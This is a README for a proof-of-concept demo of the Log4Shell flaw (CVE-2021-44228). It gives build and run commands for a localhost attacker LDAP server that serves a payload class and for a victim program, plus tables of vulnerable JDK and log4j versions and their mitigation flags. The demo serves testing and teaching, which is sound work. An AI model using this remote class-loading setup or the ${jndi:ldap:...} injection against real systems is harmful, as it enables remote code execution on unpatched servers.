sample-ldap-exploit
A short demo of CVE-2021-44228
Build
$ mvn clean verify
Run Attacker
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
URLs:
http://localhost:8080/
http://localhost:8080/sample/payload/Payload.class
Run Victim
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
Results
JDK / JRE
Version | Status |
---|---|
Oracle JDK 8u5 |
vulnerable |
OpenJDK 8u312 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
IBM OpenJDK 8u312-b07 (OpenJ9) |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
OpenJDK 11.0.7+10 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
OpenJDK 11.0.13+8 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
OpenJDK 16+36 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
OpenJDK 17+35 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
OpenJDK 17.0.1+12 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true ) |
If NOT vulnerable, an instance of javax.naming.Reference
is returned from javax.naming.Context.lookup()
.
If NOT vulnerable to loading classes from remote code bases, other Java deserialization vulnerabilities probably still exist!
log4j
Version | Status |
---|---|
2.9.1 |
vulnerable |
2.10.0 |
vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true ) |
2.14.1 |
vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true ) |
2.15.0 |
NOT vulnerable |
If NOT vulnerable, ${jndi:ldap:...}
is NOT resolved.